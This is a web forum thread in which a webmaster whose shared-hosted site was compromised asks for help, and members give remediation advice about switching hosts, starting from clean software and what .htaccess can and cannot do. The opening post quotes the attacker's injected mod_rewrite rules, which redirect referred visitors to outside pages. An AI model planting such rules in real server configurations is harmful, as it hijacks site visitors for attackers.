homepage Welcome to WebmasterWorld Guest from 23.21.9.44
register, free tools, login, search, pro membership, help, library, announcements, recent posts, open posts,
Become a Pro Member
Visit PubCon.com
Home / Forums Index / Code, Content, and Presentation / Apache Web Server
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL & phranque

Apache Web Server Forum

This 46 message thread spans 2 pages: < < 46 ( 1 [2]     
Htaccess hijacked.
dr0832




msg:4535612
 5:33 am on Jan 13, 2013 (gmt 0)

Hi I just noticed my website has been redirecting to a different website without my knowledge. The site is hosted on Luckyregister which is basically Godaddy. My Htaccess is redirecting to http://example.com/hecs.html. When I looked at Htacess there is also some russian site: http://example.tu/mhos.html which I assume has something to do with whoever did this.

Can anyone tell me exactly how to get rid of this and give me an example of the default code for the Htaccess file? I really have no clue about this sort of thing. I notice I have 3 Htacess files that have the identical code below. Also I found 3 php files on my server (called default.php) that had some sort of encrypted code in them and I read that these were somehow linked to the hack in my Htacess file.

Also if possible I would like to add the code to the default Htacess so this can't happen again. Any help would be appreciated since I have no experience with any of this, yet more knowledge than the average person.

________________________________



RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://example.com/hecs.html?h=1127349 [L,R]



RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://example.ru/mhos.html [L,R]

[edited by: incrediBILL at 7:01 am (utc) on Jan 13, 2013]
[edit reason] fixed URLS, use Example.com [/edit]

 

dr0832




msg:4536351
 1:54 am on Jan 16, 2013 (gmt 0)

I plan to backup everything but I still don't know how to secure anything. Is a password or blocking a ip address or range of ip's a viable solution? Also would using some like this be useful for creating a more secure .Htacess file?

wheel




msg:4536353
 2:07 am on Jan 16, 2013 (gmt 0)

No and no. Blocking IP's will not fix the problem. And as I mentioned...forget the .htaccess file. That has basically nothing to do with security. The hackers apparently put that in so they could redirect your site, which is the kind of thing that .htaccess does (redirect, not secure)

The hackers almost certainly got in through one of three ways:
1) they got one of your passwords (so when you move hosting companies, change all your passwords).
2) they cracked a script on your website, so as I noted, start with a new version of any scripts. That assumes that if you're using a CMS or something, that a new and clean version won't have the exploit (which is why I said don't use a backup).
3) they came in through your hosting company. And you've told us how much your hosting company.

Frankly, I think there's a pretty good chance they came in through your host. If not, they almost certainly came in through a script on your site. And the easiest way to mostly get this fixed is the procedure I outlined - start fresh elsewhere.

Let me be clear - if you want to stay on your host with your existing site then you need to bring in a pro to diagnose where the hacker got in. Nothing less will do. If you're not doing that, then you're just wasting your time. Otherwise if you want a solution that's cheap and fast and is probably effective, follow the steps I outlined. It's what I'd do if I was on shared hosting. If you start now, you could be live and fixed somewhere by tomorrow rather than still figuring this stuff out. In other words - quit trying to figure out the problem and just go directly to the solution.

incrediBILL




msg:4536368
 3:02 am on Jan 16, 2013 (gmt 0)

When you're hacked, blocking IPs is just a temporary crutch to stop a situation like a botnet sending you millions of emails to spam. It does not solve anything, only puts the problem on hold while you find a permanent solution, assuming they don't have multiple ways in and it auto-switches IPs when it notices it loses contact which the more sophisticated may do.

It's what I'd do if I was on shared hosting. If you start now, you could be live and fixed somewhere by tomorrow rather than still figuring this stuff out. In other words - quit trying to figure out the problem and just go directly to the solution.


Like wheel said.

If it we're mine, I'd move to a new server IMMEDIATELY and make sure I have a clean software installation of any scripts I'm using before making it public again.

Mainly because in a ahared server environment you can't be sure if it's the server hacked or just your account and you can't trust server admins to know the difference or even tell the truth about it. I published about a hosting company a couple of years ago with about 50% of their accounts having a virus injector on their home pages, multiple servers, it was a big mess and they were telling individual customers that they needed to change their FTP passwords. Yeah, right.

Anything short of moving to a 100% clean environment is just wasting your time, money, and if ecommerce risking your customers CC numbers and potentially your merchant account.

dr0832




msg:4536376
 3:39 am on Jan 16, 2013 (gmt 0)

wilderness what should be added to that to provide protection?

cabbie




msg:4536394
 4:24 am on Jan 16, 2013 (gmt 0)

I have been hacked many times.
I would say about 50% of the time, its a vulnerability on my site and 50% its the hosts.
I guarantee though that the hosts deny responsibilty 100% of the time!
Even when you point out other websites on their servers that have the same hack.
I recently had hack on one of my better sites through a news feed and the hack created a thousand .php pages promoting pills with a simple text file. He then used the same vulnerability of many other peoples sites and created tens of thousands links to those pages he created on my site.
I really only noticed when I got a jump in my main serps and a email in my webmaster tools account that I have a sudden increase of traffic and revenue.
All those thousands of extra links to those pill pages boosted my own mainstream serps.
I was almost reluctant to clean the hack and disavow the links :)
but I did and my traffic and serps plummeted henceforth.
I saw no evidence that my pill pages were ranking.

wilderness




msg:4536397
 4:35 am on Jan 16, 2013 (gmt 0)

what should be added to that to provide protection?


That may only be determined by reviewing your logs, and locating the point of intrusion.

wilderness




msg:4536398
 4:43 am on Jan 16, 2013 (gmt 0)

recap

I did have a php contact form I believe.


There aren't that many files on my website because its just about 5 pages in total.


This is surely the most participated thread in this forum in a very long while.

Many folks have provided valid insights.

Multiple folks have conveyed the urgency of determining the initial vulnerability.

Unfortunately folks are overlooking the simplicity of the site.

lucy24




msg:4536400
 5:11 am on Jan 16, 2013 (gmt 0)

Unfortunately folks are overlooking the simplicity of the site.

That's why I asked about databases. Not all sites that look simple really are simple. This one probably is. (You "believe" you had a php contact form? Did you or didn't you? Did the hacker add one that wasn't there before, or delete one that you'd forgotten you had?)

Your site itself is probably not the target. But that's like saying that the burglar who broke into your basement apartment really did it to get easier access to the pricey penthouses-- and their pricey contents-- upstairs. You don't care about the penthouses; you just don't want to have to buy a new TV every other week.

To keep them from breaking in again, you have to maintain just as much security as if you did live in one of those attractive penthouses. And if the building owner can't figure out that the person who hacked into your expendable $9.95/month site is now on his way to the $995/month VPS that he really doesn't want to lose ... then it's time to move.


Second recap:

What changes have you made so far?

The original post was pretty exactly three days ago. That's time for a lot of things to get done.

what should be added to [the .htaccess file] to provide protection?

A padlock. There is nothing you can put in the htaccess itself that will prevent people from overwriting or editing the file; that's simply not what htaccess does.

Right now, it should say something like:

RewriteRule .* - [R=503,L]
dr0832




msg:4536406
 5:49 am on Jan 16, 2013 (gmt 0)

Yes 3 days is time for things to get done for someone that knows about how all this works. I am computer literate more than most people, but I don't know anything about hacking.

I actually had a couple php files which were not actually being used . They were originally placed on my server by my host for an email contact page but I didn't like how they worked so I stopped using them, but left the files. I have since deleted them. The contact page on my site has some form from www.jotform.com/ which I assume uses php. Whoever did this placed 3 other php files which had some sort of encrypted code. I have read other posts online where people also found these files name differently, on their sites.

incrediBILL




msg:4536413
 5:53 am on Jan 16, 2013 (gmt 0)

Unfortunately folks are overlooking the simplicity of the site.


That's why I assumed an infected server.

wilderness




msg:4536416
 5:57 am on Jan 16, 2013 (gmt 0)

dr,
lucy was inquiring as to what changes have been made in the past three days (her comment was rhetorical and not meant as criticism).

wheel




msg:4536503
 11:34 am on Jan 16, 2013 (gmt 0)

>>>>I plan to backup everything but I still don't know how to secure anything.

You aren't going to learn how to secure anything. Instead you're going to start with fresh software or fresh pages, on a fresh host. That leaves the vulnerability and exploit behind.

>>Also would using some like this be useful for creating a more secure .Htacess file?
Are you even reading this thread? The answer is no. Your htaccess file is not for security.

>>Is a password or blocking a ip address or range of ip's a viable solution?
Again, did you read the multiple posts in this thread about this? The answer again is no. Either find the vulnerability - and you can't because that takes a pro, or start with fresh software on a fresh host. You are not going to recieve an answer like 'they came in through this file, and therefore if you change line 18 the problem will be fixed'.

dr0832




msg:4536569
 3:26 pm on Jan 16, 2013 (gmt 0)

wheel thanks. You spoke my language. I was under the impression that it was possible to add code to the .Htaccess and that could help prevent it. I guess reading for hours upon hours online is not a good way to learn because many people on other forums were mentioning adding specific lines to .Htaccess to secure it. Thanks your your help.

Wizcrafts




msg:4536677
 10:20 pm on Jan 16, 2013 (gmt 0)

The other people you referred to, on other forums, may have been referring to the 3 lines of code that can be added to prevent people from reading .htaccess files online, in their browsers. It is just like a Do Not Disturb sign to curious onlookers and is ignored if they possess a key to your virtual room (website). It has no affect if somebody has "Owner" write access to your website. There are only a few ways that can happen. One is if you somehow give up or are stripped of your (cpanel or ftp) login credentials, or if a server admin gives up the master credentials, or the server gets hacked through some other means and the hack affects all virtual hosts with accounts on that box.

What have you done thus-far to secure your website against further compromises?

Andem




msg:4536696
 11:36 pm on Jan 16, 2013 (gmt 0)

Based on my experience, I would like to suggest that this sounds more like a service vulnerability than an issue with a PHP contact form, especially if the .htaccess file was edited. If it wasn't edited and just appeared/overwrote your old .htaccess file, then the contact form sounds like the likely culprit.

If your site really is only 5 html files and a contact form, I urge you to immediately move to a new host with a solid reputation. I'd also suggest getting rid of the contact form and find something you can confirm is not currently vulnerable as a replacement if need be.

lucy24




msg:4536730
 1:53 am on Jan 17, 2013 (gmt 0)

I actually had a couple php files which were not actually being used . They were originally placed on my server by my host for an email contact page but I didn't like how they worked so I stopped using them, but left the files. I have since deleted them. The contact page on my site has some form from www.jotform.com/ which I assume uses php.

Do not allow anything to exist on your site that you don't understand. If you are big, your employees count as "you". Part of their job is to understand the things you don't. Part of your own job is to figure out when "understand" must be taken literally and when it can mean "I've got a general idea what this line does but don't ask me what 'preg' stands for".

If you're using material from outside sources, make sure it's an established source with an impeccable reputation.

:: idly wondering how many sites got hacked via third-party counters back when those were fashionable ::

For htaccess, consider this: You can easily put a few lines in htaccess to lock yourself out. I do it all the time when testing code. So how do you get back in? By editing or replacing the htaccess. The block you put in place can't prevent this from happening; it only prevents you from visiting your site in a browser.

"When in doubt, don't" is probably a safe guideline.

This 46 message thread spans 2 pages: < < 46 ( 1 [2]
Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / Apache Web Server
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved